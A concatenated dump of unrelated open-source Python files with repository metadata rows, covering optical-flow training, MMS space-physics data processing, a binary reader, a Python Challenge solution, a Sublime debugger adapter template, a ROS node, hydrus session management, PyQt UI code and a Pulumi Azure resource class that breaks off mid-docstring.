# criterion = flow_utils.RobustLoss(0.01, 0.4)
n_iter = start_epoch * math.ceil(float(trainset.__len__()) / batch_size)
model.train()
for epoch in range(start_epoch, max_epochs):
for image1, image2, flow_gt in trainloader:
image1 = image1.cuda()
image2 = image2.cuda()
flow_gt = [flow.cuda() for flow in flow_gt]
flow_hat = model(image1, image2)
loss = alpha[0] * criterion(flow_hat[0], flow_gt[0]) + \
alpha[1] * criterion(flow_hat[1], flow_gt[1]) + \
alpha[2] * criterion(flow_hat[2], flow_gt[2])
optimizer.zero_grad()
loss.backward()
optimizer.step()
n_iter += 1
scheduler.step()
if n_iter % log_interval == 0:
print('epoch [{}/{}], iteration [{}], loss: {:.5f}'.format(epoch + 1,
max_epochs, n_iter, loss.item()))
# visualizations
writer.add_scalar('data/loss', loss.item(), n_iter)
n_samples = flow_gt[0].shape[0]
flow_hat_image = torch.stack([flowviz_transform(flow_hat[0].detach().cpu()[i, :, :, :]) for i in range(n_samples)])
flow_gt_image = torch.stack([flowviz_transform(flow_gt[0].detach().cpu()[i, :, :, :]) for i in range(n_samples)])
image1_resized = torch.stack([imageviz_transform(image1.cpu()[i, :, :, :]) for i in range(n_samples)])
flow_image = torch.cat((image1_resized, flow_gt_image, flow_hat_image))
progress_images = vutils.make_grid(flow_image, nrow=batch_size)
writer.add_image('flows', progress_images, n_iter)
if (epoch + 1) % save_interval == 0:
checkpoint_file = os.path.join(os.getcwd(), 'states', training_set, 'srpwc_%d.pkl' % (epoch + 1))
torch.save(model.state_dict(), checkpoint_file)
verror = 0
viters = 0
for image1, image2, flow_gt in validloader:
image1 = image1.cuda()
image2 = image2.cuda()
flow_gt = [flow.cuda() for flow in flow_gt]
flow_hat = model(image1, image2)
verror += flow_utils.AEPE(5 * flow_gt[0], 5 * flow_hat[0]).item()
viters += 1
writer.add_scalar('data/aepe', verror / viters, n_iter)
writer.close()
| 31.069767
| 128
| 0.665232
|
4a1468295604457cdf2851be5a5fc5e785a2bde6
| 2,453
|
py
|
Python
|
pyspedas/mms/feeps/mms_feeps_spin_avg.py
|
asherp/pyspedas
|
b9856157e63a711f3d7b979b15b3bafade2bd2a8
|
[
"MIT"
] | null | null | null |
pyspedas/mms/feeps/mms_feeps_spin_avg.py
|
asherp/pyspedas
|
b9856157e63a711f3d7b979b15b3bafade2bd2a8
|
[
"MIT"
] | null | null | null |
pyspedas/mms/feeps/mms_feeps_spin_avg.py
|
asherp/pyspedas
|
b9856157e63a711f3d7b979b15b3bafade2bd2a8
|
[
"MIT"
] | null | null | null |
import warnings
import numpy as np
from pytplot import get_data, store_data, options
def mms_feeps_spin_avg(probe='1', data_units='intensity', datatype='electron', data_rate='srvy', level='l2', suffix=''):
"""
This function will spin-average the omni-directional FEEPS energy spectra
Parameters:
probe: str
probe #, e.g., '4' for MMS4
data_units: str
'intensity' or 'count_rate'
datatype: str
'electron' or 'ion'
data_rate: str
instrument data rate, e.g., 'srvy' or 'brst'
level: str
data level, e.g., 'l2'
suffix: str
suffix of the loaded data
Returns:
Name of tplot variable created.
"""
units_label = ''
if data_units == 'intensity':
units_label = '1/(cm^2-sr-s-keV)'
elif data_units == 'counts':
units_label = '[counts/s]'
if datatype == 'electron':
lower_en = 71
else:
lower_en = 78
prefix = 'mms'+str(probe)+'_epd_feeps_'
# get the spin sectors
# v5.5+ = mms1_epd_feeps_srvy_l1b_electron_spinsectnum
sector_times, spin_sectors = get_data(prefix + data_rate + '_' + level + '_' + datatype + '_spinsectnum' + suffix)
spin_starts = [spin_end + 1 for spin_end in np.where(spin_sectors[:-1] >= spin_sectors[1:])[0]]
var_name = prefix + data_rate + '_' + level + '_' + datatype + '_' + data_units + '_omni'
times, data, energies = get_data(var_name)
spin_avg_flux = np.zeros([len(spin_starts), len(energies)])
current_start = spin_starts[0]
for spin_idx in range(1, len(spin_starts)-1):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=RuntimeWarning)
spin_avg_flux[spin_idx-1, :] = np.nanmean(data[current_start:spin_starts[spin_idx]+1, :], axis=0)
current_start = spin_starts[spin_idx] + 1
store_data(var_name + '_spin' + suffix, data={'x': times[spin_starts], 'y': spin_avg_flux, 'v': energies})
options(var_name + '_spin' + suffix, 'spec', True)
options(var_name + '_spin' + suffix, 'ylog', True)
options(var_name + '_spin' + suffix, 'zlog', True)
options(var_name + '_spin' + suffix, 'Colormap', 'jet')
options(var_name + '_spin' + suffix, 'ztitle', units_label)
options(var_name + '_spin' + suffix, 'ytitle', 'MMS' + str(probe) + ' ' + datatype + ' (keV)')
return var_name + '_spin' + suffix
| 35.550725
| 120
| 0.618019
|
4a1468655827d2c49ea4832b4a93c1513a468e17
| 916
|
py
|
Python
|
PyByteReader/byte_reader.py
|
ventralnet/PyByteReader
|
e4e9c8fda4a45aad5401c66aa350ad069d3d0bf8
|
[
"MIT"
] | null | null | null |
PyByteReader/byte_reader.py
|
ventralnet/PyByteReader
|
e4e9c8fda4a45aad5401c66aa350ad069d3d0bf8
|
[
"MIT"
] | null | null | null |
PyByteReader/byte_reader.py
|
ventralnet/PyByteReader
|
e4e9c8fda4a45aad5401c66aa350ad069d3d0bf8
|
[
"MIT"
] | null | null | null |
class ByteReader:
def __init__(self, file_input):
self.file_input = file_input
def readByte(self):
return self.file_input.read(1)
def readByteAsInt(self):
return int.from_bytes(self.readByte(), "big")
    def readString(self):
        # a length byte of 0xff signals that the real length follows as a short
        length = int.from_bytes(self.readByte(), "big")
        return self.readStringLength(length if (length < 0xff) else self.readShort())
def readStringLength(self, length):
return self.file_input.read(length).decode('utf-8')
    def readInt(self):
        # assemble 4 bytes as a little-endian integer (first byte is least significant)
        data = self.file_input.read(4)
        return ((data[3] & 0xff) << 24) | ((data[2] & 0xff) << 16) | ((data[1] & 0xff) << 8) | (data[0] & 0xff)
    def readShort(self):
        # assemble 2 bytes as a little-endian integer
        data = self.file_input.read(2)
        return ((data[1] & 0xff) << 8) | (data[0] & 0xff)
    def readBoolean(self):
        # non-zero byte means True
        return int.from_bytes(self.readByte(), "big") > 0
def skip(self, bytes):
self.file_input.read(bytes)
| 27.757576
| 111
| 0.649563
|
4a14689ea0e95b89b6d44a34c8f3bb2b1c3cb018
| 469
|
py
|
Python
|
myscripts/wmt14/valid_search/read_score.py
|
xx-zhou16/Grammar
|
45600cdb3e1de06551c623d289d941befba1c2b8
|
[
"MIT"
] | null | null | null |
myscripts/wmt14/valid_search/read_score.py
|
xx-zhou16/Grammar
|
45600cdb3e1de06551c623d289d941befba1c2b8
|
[
"MIT"
] | null | null | null |
myscripts/wmt14/valid_search/read_score.py
|
xx-zhou16/Grammar
|
45600cdb3e1de06551c623d289d941befba1c2b8
|
[
"MIT"
] | null | null | null |
import os
import re
def read_BLEU4(file_path):
last_line = None
with open(file_path, 'r') as f:
last_line = f.readlines()[-1]
target = re.search(r'BLEU4 = (.*?), ', last_line)
#print(target.group(1))
target = target.group(1)
return float(target)
if __name__ == "__main__":
file_path = "/mnt/xiangxin2/data/wmt14/checkpoints/top-2L-layerdrop-0.3_6L/checkpoint_best/generate-valid.txt"
print(read_BLEU4(file_path))
| 27.588235
| 114
| 0.652452
|
4a1469300e4855eb83c549ea01daf2c32220c742
| 866
|
py
|
Python
|
Python/python-tutorials/python-challenge/disproportional.py
|
zhongyangynag/code-study
|
5410929554107a384a09d899c6fa3d16ed383d2b
|
[
"MIT"
] | null | null | null |
Python/python-tutorials/python-challenge/disproportional.py
|
zhongyangynag/code-study
|
5410929554107a384a09d899c6fa3d16ed383d2b
|
[
"MIT"
] | null | null | null |
Python/python-tutorials/python-challenge/disproportional.py
|
zhongyangynag/code-study
|
5410929554107a384a09d899c6fa3d16ed383d2b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# coding: utf-8
# http://www.pythonchallenge.com/pc/return/disproportional.html
import urllib
# download file with password
# user: huge passwd: file
url="http://huge:file@www.pythonchallenge.com/pc/phonebook.php"
filename=url.split('/')[-1]
urllib.urlretrieve(url,filename)
# from the php file:
# faultCode 105
# faultString XML error: Invalid document end at line 1, column 1
# aparently, this is an xmlrpc error
import xmlrpclib
server=xmlrpclib.ServerProxy("http://www.pythonchallenge.com/pc/phonebook.php")
print server.system.listMethods()
# Got: ['phone', 'system.listMethods', 'system.methodHelp', 'system.methodSignature', 'system.multicall', 'system.getCapabilities']
print server.system.methodHelp('phone')
# Got: Returns the phone of a person
print server.phone('Bert') # 'Bert' is the hint from the previous level
# Got 555-ITALY
# next level is italy
| 28.866667
| 131
| 0.757506
|
4a14694303acf091e141ee17f52cb1b4503a92b0
| 3,254
|
py
|
Python
|
adapter/template.py
|
blurstudio/SublimeDebugger-Plugin
|
b47e531882352e89bfe02c5a7a1fbac2e90a4680
|
[
"MIT"
] | 4
|
2021-01-12T09:17:55.000Z
|
2022-02-23T13:14:23.000Z
|
adapter/template.py
|
blurstudio/SublimeDebugger-Plugin
|
b47e531882352e89bfe02c5a7a1fbac2e90a4680
|
[
"MIT"
] | null | null | null |
adapter/template.py
|
blurstudio/SublimeDebugger-Plugin
|
b47e531882352e89bfe02c5a7a1fbac2e90a4680
|
[
"MIT"
] | null | null | null |
from Debugger.modules.typecheck import *
# This import moves around based on the Debugger version being used
try:
import Debugger.modules.debugger.adapter as adapter
except:
import Debugger.modules.adapters.adapter as adapter
import sublime
# This is the id of your adapter. It must be unique and match no
# other existing adapters.
adapter_type = 'template'
class TemplateAdapter(adapter.AdapterConfiguration):
@property
def type(self): return adapter_type
async def start(self, log, configuration):
"""
start() is called when the play button is pressed in the debugger.
The configuration is passed in, allowing you to get necessary settings
to use when setting up the adapter as it starts up (such as getting the
desired host/port to connect to, show below)
The configuration will be chosen by the user from the
configuration_snippets function below, and its contents are the contents
of "body:". However, the user can change the configurations manually so
make sure to account for unexpected changes.
"""
# This function must return one of two types of Transports.
#
# The first is an StdioTransport, which communicates with the adapter
# via DAP through standard input/output. A command must be given so
# that the transport can spawn the process and communicate with it.
#
# return adapter.StdioTransport(log, ["python", "my_adapter.py"])
#
# The second is a SocketTransport, which communicates with the
# adapter through a socket connection via DAP.
host = configuration.get('host', 'localhost')
port = int(configuration.get('port', 9000))
return adapter.SocketTransport(log, host, port)
async def install(self, log):
"""
When someone installs your adapter, they will also have to install it
through the debugger itself. That is when this function is called. It
allows you to download any extra files or resources, or install items
to other parts of the device to prepare for debugging in the future
"""
pass
@property
def installed_version(self) -> Optional[str]:
# The version is only used for display in the UI
return '0.0.1'
@property
def configuration_snippets(self) -> Optional[list]:
"""
You can have several configurations here depending on your adapter's
offered functionalities, but they all need a "label", "description",
and "body"
"""
return [
{
"label": "Template Adapter",
"description": "A template debug adapter to show how to connect to the debugger",
"body": {
"name": "Template Adapter",
"type": adapter_type,
"request": "attach", # can only be attach or launch
"host": "localhost",
"port": 9000,
}
},
]
@property
def configuration_schema(self) -> Optional[dict]:
"""
I am not completely sure what this function is used for. However,
it must be present.
"""
return None
async def configuration_resolve(self, configuration):
"""
In this function, you can take a currently existing configuration and
resolve various variables in it before it gets passed to start().
Therefore, configurations where values are stated as {my_var} can
then be filled out before being used to start the adapter.
"""
return configuration
| 29.853211
| 85
| 0.722495
|
4a1469b6007eb43c8ea911ee36cf0b4ea0c6bbef
| 867
|
py
|
Python
|
demos/grasp_fusion/ros/grasp_fusion/node_scripts/bounding_box_to_tf.py
|
pazeshun/jsk_apc
|
0ff42000ad5992f8a31e719a5360a39cf4fa1fde
|
[
"BSD-3-Clause"
] | null | null | null |
demos/grasp_fusion/ros/grasp_fusion/node_scripts/bounding_box_to_tf.py
|
pazeshun/jsk_apc
|
0ff42000ad5992f8a31e719a5360a39cf4fa1fde
|
[
"BSD-3-Clause"
] | 2
|
2019-04-11T05:36:23.000Z
|
2019-08-19T12:58:10.000Z
|
demos/grasp_fusion/ros/grasp_fusion/node_scripts/bounding_box_to_tf.py
|
pazeshun/jsk_apc
|
0ff42000ad5992f8a31e719a5360a39cf4fa1fde
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import rospy
import tf
from jsk_recognition_msgs.msg import BoundingBox
class BoundingBoxToTf(object):
def __init__(self):
self.tf_frame = rospy.get_param('~tf_frame', 'bounding_box')
self.broadcaster = tf.TransformBroadcaster()
self.sub = rospy.Subscriber('~input', BoundingBox, self._cb)
def _cb(self, bbox):
pos = bbox.pose.position
ornt = bbox.pose.orientation
self.broadcaster.sendTransform((pos.x, pos.y, pos.z),
(ornt.x, ornt.y, ornt.z, ornt.w),
rospy.Time.now(),
self.tf_frame,
bbox.header.frame_id)
if __name__ == '__main__':
    rospy.init_node('bounding_box_to_tf')
app = BoundingBoxToTf()
rospy.spin()
| 27.09375
| 72
| 0.55594
|
4a146a4aac7916f514dfa1386dd29d72870956fd
| 1,838
|
py
|
Python
|
dql/expressions/base.py
|
ikonst/dql
|
e9d3aa22873076dae5ebd02e35318aa996b1e56a
|
[
"MIT"
] | null | null | null |
dql/expressions/base.py
|
ikonst/dql
|
e9d3aa22873076dae5ebd02e35318aa996b1e56a
|
[
"MIT"
] | null | null | null |
dql/expressions/base.py
|
ikonst/dql
|
e9d3aa22873076dae5ebd02e35318aa996b1e56a
|
[
"MIT"
] | null | null | null |
""" Common utilities for all expressions """
from future.utils import python_2_unicode_compatible
import re
from .visitor import dummy_visitor
PATH_PATTERN = re.compile(r"\w+|\[(\d+)\]")
@python_2_unicode_compatible
class Expression(object):
""" Base class for all expressions and expression fragments """
def build(self, visitor):
""" Build string expression, using the visitor to encode values """
raise NotImplementedError
def __str__(self):
return self.build(dummy_visitor)
class Field(Expression):
""" Wrapper for a field in an expression """
def __init__(self, field):
self.field = field
def build(self, visitor):
return visitor.get_field(self.field)
def evaluate(self, item):
""" Pull the field off the item """
try:
for match in PATH_PATTERN.finditer(self.field):
path = match.group(0)
if path[0] == "[":
# If we're selecting an item at a specific index of an
# array, we will usually not get back the whole array from
# Dynamo. It'll return an array with one element.
try:
item = item[int(match.group(1))]
except IndexError:
item = item[0]
else:
item = item.get(path)
except (IndexError, TypeError, AttributeError):
return None
return item
class Value(Expression):
""" Wrapper for a value in an expression """
def __init__(self, val):
self.value = val
def build(self, visitor):
return visitor.get_value(self.value)
def evaluate(self, item):
""" Values evaluate to themselves regardless of the item """
return self.value
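# --- usage sketch, not part of the original module (the sample item is made up) ---
# Field walks dotted/indexed paths with PATH_PATTERN, degrading to None on
# missing keys; Value ignores the item entirely:
#   item = {"tags": ["a", "b"], "meta": {"owner": "me"}}
#   Field("tags[0]").evaluate(item)    -> "a"   (list index lookup)
#   Field("meta.owner").evaluate(item) -> "me"  (nested map lookup)
#   Field("missing").evaluate(item)    -> None
#   Value(42).evaluate(item)           -> 42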
| 27.029412
| 78
| 0.583243
|
4a146be7c9402cec4fe37f5638a1b2804b9f885f
| 7,249
|
py
|
Python
|
include/ClientNetworkingSessions.py
|
MsgLosers/hydrus
|
febaa5ff1a6b94a49d0eba513ff41541c57f78cc
|
[
"WTFPL"
] | null | null | null |
include/ClientNetworkingSessions.py
|
MsgLosers/hydrus
|
febaa5ff1a6b94a49d0eba513ff41541c57f78cc
|
[
"WTFPL"
] | 50
|
2019-04-05T02:25:13.000Z
|
2019-04-27T04:29:31.000Z
|
include/ClientNetworkingSessions.py
|
MsgLosers/hydrus
|
febaa5ff1a6b94a49d0eba513ff41541c57f78cc
|
[
"WTFPL"
] | null | null | null |
import pickle
from . import ClientConstants as CC
from . import ClientNetworkingContexts
from . import ClientNetworkingDomain
from . import HydrusData
from . import HydrusSerialisable
from . import HydrusGlobals as HG
import requests
import threading
try:
import socket
import socks
SOCKS_PROXY_OK = True
except:
SOCKS_PROXY_OK = False
class NetworkSessionManager( HydrusSerialisable.SerialisableBase ):
SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_NETWORK_SESSION_MANAGER
SERIALISABLE_NAME = 'Session Manager'
SERIALISABLE_VERSION = 1
SESSION_TIMEOUT = 60 * 60
def __init__( self ):
HydrusSerialisable.SerialisableBase.__init__( self )
self.engine = None
self._dirty = False
self._lock = threading.Lock()
self._network_contexts_to_sessions = {}
self._network_contexts_to_session_timeouts = {}
self._proxies_dict = {}
self._Reinitialise()
HG.client_controller.sub( self, 'Reinitialise', 'notify_new_options' )
def _CleanSessionCookies( self, network_context, session ):
if network_context not in self._network_contexts_to_session_timeouts:
self._network_contexts_to_session_timeouts[ network_context ] = 0
if HydrusData.TimeHasPassed( self._network_contexts_to_session_timeouts[ network_context ] ):
session.cookies.clear_session_cookies()
self._network_contexts_to_session_timeouts[ network_context ] = HydrusData.GetNow() + self.SESSION_TIMEOUT
session.cookies.clear_expired_cookies()
def _GenerateSession( self, network_context ):
session = requests.Session()
if network_context.context_type == CC.NETWORK_CONTEXT_HYDRUS:
session.verify = False
return session
def _GetSerialisableInfo( self ):
serialisable_network_contexts_to_sessions = [ ( network_context.GetSerialisableTuple(), pickle.dumps( session ).hex() ) for ( network_context, session ) in list(self._network_contexts_to_sessions.items()) ]
return serialisable_network_contexts_to_sessions
def _GetSessionNetworkContext( self, network_context ):
# just in case one of these slips through somehow
if network_context.context_type == CC.NETWORK_CONTEXT_DOMAIN:
second_level_domain = ClientNetworkingDomain.ConvertDomainIntoSecondLevelDomain( network_context.context_data )
network_context = ClientNetworkingContexts.NetworkContext( CC.NETWORK_CONTEXT_DOMAIN, second_level_domain )
return network_context
def _InitialiseFromSerialisableInfo( self, serialisable_info ):
serialisable_network_contexts_to_sessions = serialisable_info
for ( serialisable_network_context, pickled_session_hex ) in serialisable_network_contexts_to_sessions:
network_context = HydrusSerialisable.CreateFromSerialisableTuple( serialisable_network_context )
try:
session = pickle.loads( bytes.fromhex( pickled_session_hex ) )
except:
                # a newer version of requests uses a different pickle format, so skip this session
continue
session.cookies.clear_session_cookies()
self._network_contexts_to_sessions[ network_context ] = session
def _Reinitialise( self ):
self._proxies_dict = {}
http_proxy = HG.client_controller.new_options.GetNoneableString( 'http_proxy' )
https_proxy = HG.client_controller.new_options.GetNoneableString( 'https_proxy' )
if http_proxy is not None:
self._proxies_dict[ 'http' ] = http_proxy
if https_proxy is not None:
self._proxies_dict[ 'https' ] = https_proxy
def _SetDirty( self ):
self._dirty = True
def ClearSession( self, network_context ):
with self._lock:
network_context = self._GetSessionNetworkContext( network_context )
if network_context in self._network_contexts_to_sessions:
del self._network_contexts_to_sessions[ network_context ]
self._SetDirty()
def GetNetworkContexts( self ):
with self._lock:
return list(self._network_contexts_to_sessions.keys())
def GetSession( self, network_context ):
with self._lock:
network_context = self._GetSessionNetworkContext( network_context )
if network_context not in self._network_contexts_to_sessions:
self._network_contexts_to_sessions[ network_context ] = self._GenerateSession( network_context )
session = self._network_contexts_to_sessions[ network_context ]
if session.proxies != self._proxies_dict:
session.proxies = dict( self._proxies_dict )
#
self._CleanSessionCookies( network_context, session )
#
            # tumblr has trouble with ssl for some reason, and the data subdomain it uses has weird cert properties, looking like amazon S3
            # perhaps it is inward-facing somehow? whatever the case, just skip certificate verification for tumblr
if network_context.context_type == CC.NETWORK_CONTEXT_DOMAIN and network_context.context_data == 'tumblr.com':
session.verify = False
#
self._SetDirty()
return session
def GetSessionForDomain( self, domain ):
network_context = ClientNetworkingContexts.NetworkContext( context_type = CC.NETWORK_CONTEXT_DOMAIN, context_data = domain )
return self.GetSession( network_context )
def IsDirty( self ):
with self._lock:
return self._dirty
def Reinitialise( self ):
with self._lock:
self._Reinitialise()
def SetClean( self ):
with self._lock:
self._dirty = False
HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_NETWORK_SESSION_MANAGER ] = NetworkSessionManager
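# --- usage sketch, not part of the original module (requires a running client controller) ---
# _GetSessionNetworkContext() collapses domain contexts to their second-level
# domain, so these two calls would return the same requests.Session object:
#   session_manager = NetworkSessionManager()
#   s1 = session_manager.GetSessionForDomain('example.com')
#   s2 = session_manager.GetSessionForDomain('subdomain.example.com')  # s1 is s2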
| 29.709016
| 214
| 0.576217
|
4a146c6d85af3347c63d3a82c950192160d2063a
| 5,127
|
py
|
Python
|
aui/gui/robot/internal/ui_wifi.py
|
argenortega/AUI
|
5e90bb59e283e829cb41d07dff9d1c8c75daa890
|
[
"MIT"
] | null | null | null |
aui/gui/robot/internal/ui_wifi.py
|
argenortega/AUI
|
5e90bb59e283e829cb41d07dff9d1c8c75daa890
|
[
"MIT"
] | null | null | null |
aui/gui/robot/internal/ui_wifi.py
|
argenortega/AUI
|
5e90bb59e283e829cb41d07dff9d1c8c75daa890
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/wifi.ui'
#
# Created: Mon Aug 31 12:21:34 2015
# by: PyQt4 UI code generator 4.11.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_WifiStatus(object):
def setupUi(self, WifiStatus):
WifiStatus.setObjectName(_fromUtf8("WifiStatus"))
WifiStatus.resize(105, 108)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(WifiStatus.sizePolicy().hasHeightForWidth())
WifiStatus.setSizePolicy(sizePolicy)
WifiStatus.setMinimumSize(QtCore.QSize(100, 0))
WifiStatus.setMaximumSize(QtCore.QSize(150, 16777215))
self.horizontalLayout_2 = QtGui.QHBoxLayout(WifiStatus)
self.horizontalLayout_2.setSpacing(0)
self.horizontalLayout_2.setMargin(0)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.wifiLevel = QtGui.QGroupBox(WifiStatus)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wifiLevel.sizePolicy().hasHeightForWidth())
self.wifiLevel.setSizePolicy(sizePolicy)
self.wifiLevel.setMinimumSize(QtCore.QSize(0, 30))
self.wifiLevel.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(11)
self.wifiLevel.setFont(font)
self.wifiLevel.setCheckable(True)
self.wifiLevel.setObjectName(_fromUtf8("wifiLevel"))
self.wifiLayout = QtGui.QVBoxLayout(self.wifiLevel)
self.wifiLayout.setSpacing(0)
self.wifiLayout.setMargin(0)
self.wifiLayout.setObjectName(_fromUtf8("wifiLayout"))
self.frame = QtGui.QFrame(self.wifiLevel)
self.frame.setFrameShape(QtGui.QFrame.NoFrame)
self.frame.setFrameShadow(QtGui.QFrame.Plain)
self.frame.setObjectName(_fromUtf8("frame"))
self.verticalLayout = QtGui.QVBoxLayout(self.frame)
self.verticalLayout.setSpacing(25)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.wifi = CProgressBar(self.frame)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wifi.sizePolicy().hasHeightForWidth())
self.wifi.setSizePolicy(sizePolicy)
self.wifi.setMinimumSize(QtCore.QSize(0, 25))
self.wifi.setProperty("value", 100)
self.wifi.setAlignment(QtCore.Qt.AlignCenter)
self.wifi.setObjectName(_fromUtf8("wifi"))
self.verticalLayout.addWidget(self.wifi)
self.repair = QtGui.QPushButton(self.frame)
self.repair.setMinimumSize(QtCore.QSize(44, 44))
self.repair.setStyleSheet(_fromUtf8("QPushButton{ \n"
" background-color: rgb(255, 255, 255);\n"
" border-style: outset;\n"
" border-width: 1px;\n"
" border-radius: 6px;\n"
" border-color: rgb(193, 193, 193);\n"
" border-style: solid;\n"
" padding: 6px;\n"
" \n"
"}\n"
"QPushButton:pressed { \n"
" border-style: solid;\n"
" border-width: 1px;\n"
" border-radius: 6px;\n"
" background-color: rgb(48, 131, 251);\n"
" color: rgb(255, 255, 255);\n"
"}\n"
"\n"
"QPushButton:hover{\n"
" border-color: rgb(164, 205, 255);\n"
" border-radius: 6px;\n"
" border-width: 3px;\n"
" border-style: solid;\n"
"}"))
self.repair.setObjectName(_fromUtf8("repair"))
self.verticalLayout.addWidget(self.repair)
self.wifiLayout.addWidget(self.frame)
self.horizontalLayout_2.addWidget(self.wifiLevel)
self.retranslateUi(WifiStatus)
QtCore.QObject.connect(self.wifiLevel, QtCore.SIGNAL(_fromUtf8("clicked(bool)")), self.frame.setVisible)
QtCore.QMetaObject.connectSlotsByName(WifiStatus)
def retranslateUi(self, WifiStatus):
WifiStatus.setWindowTitle(_translate("WifiStatus", "Form", None))
self.wifiLevel.setTitle(_translate("WifiStatus", "WiFi", None))
self.repair.setText(_translate("WifiStatus", "Repair", None))
from aui.mi.visual import CProgressBar
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
WifiStatus = QtGui.QWidget()
ui = Ui_WifiStatus()
ui.setupUi(WifiStatus)
WifiStatus.show()
sys.exit(app.exec_())
| 40.054688
| 112
| 0.694363
|
4a146ded64da613fdda3e66fe72debc785bd038b
| 28,092
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/web/v20190801/web_app_auth_settings_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 31
|
2020-09-21T09:41:01.000Z
|
2021-02-26T13:21:59.000Z
|
sdk/python/pulumi_azure_nextgen/web/v20190801/web_app_auth_settings_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 231
|
2020-09-21T09:38:45.000Z
|
2021-03-01T11:16:03.000Z
|
sdk/python/pulumi_azure_nextgen/web/v20190801/web_app_auth_settings_slot.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 4
|
2020-09-29T14:14:59.000Z
|
2021-02-10T20:38:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from ._enums import *
__all__ = ['WebAppAuthSettingsSlot']
class WebAppAuthSettingsSlot(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
additional_login_params: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
allowed_audiences: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
allowed_external_redirect_urls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
client_id: Optional[pulumi.Input[str]] = None,
client_secret: Optional[pulumi.Input[str]] = None,
client_secret_certificate_thumbprint: Optional[pulumi.Input[str]] = None,
default_provider: Optional[pulumi.Input['BuiltInAuthenticationProvider']] = None,
enabled: Optional[pulumi.Input[bool]] = None,
facebook_app_id: Optional[pulumi.Input[str]] = None,
facebook_app_secret: Optional[pulumi.Input[str]] = None,
facebook_o_auth_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
google_client_id: Optional[pulumi.Input[str]] = None,
google_client_secret: Optional[pulumi.Input[str]] = None,
google_o_auth_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
issuer: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
microsoft_account_client_id: Optional[pulumi.Input[str]] = None,
microsoft_account_client_secret: Optional[pulumi.Input[str]] = None,
microsoft_account_o_auth_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
runtime_version: Optional[pulumi.Input[str]] = None,
slot: Optional[pulumi.Input[str]] = None,
token_refresh_extension_hours: Optional[pulumi.Input[float]] = None,
token_store_enabled: Optional[pulumi.Input[bool]] = None,
twitter_consumer_key: Optional[pulumi.Input[str]] = None,
twitter_consumer_secret: Optional[pulumi.Input[str]] = None,
unauthenticated_client_action: Optional[pulumi.Input['UnauthenticatedClientAction']] = None,
validate_issuer: Optional[pulumi.Input[bool]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Configuration settings for the Azure App Service Authentication / Authorization feature.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_login_params: Login parameters to send to the OpenID Connect authorization endpoint when
a user logs in. Each parameter must be in the form "key=value".
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_audiences: Allowed audience values to consider when validating JWTs issued by
Azure Active Directory. Note that the <code>ClientID</code> value is always considered an
allowed audience, regardless of this setting.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_external_redirect_urls: External URLs that can be redirected to as part of logging in or logging out of the app. Note that the query string part of the URL is ignored.
This is an advanced setting typically only needed by Windows Store application backends.
Note that URLs within the current domain are always implicitly allowed.
:param pulumi.Input[str] client_id: The Client ID of this relying party application, known as the client_id.
This setting is required for enabling OpenID Connection authentication with Azure Active Directory or
other 3rd party OpenID Connect providers.
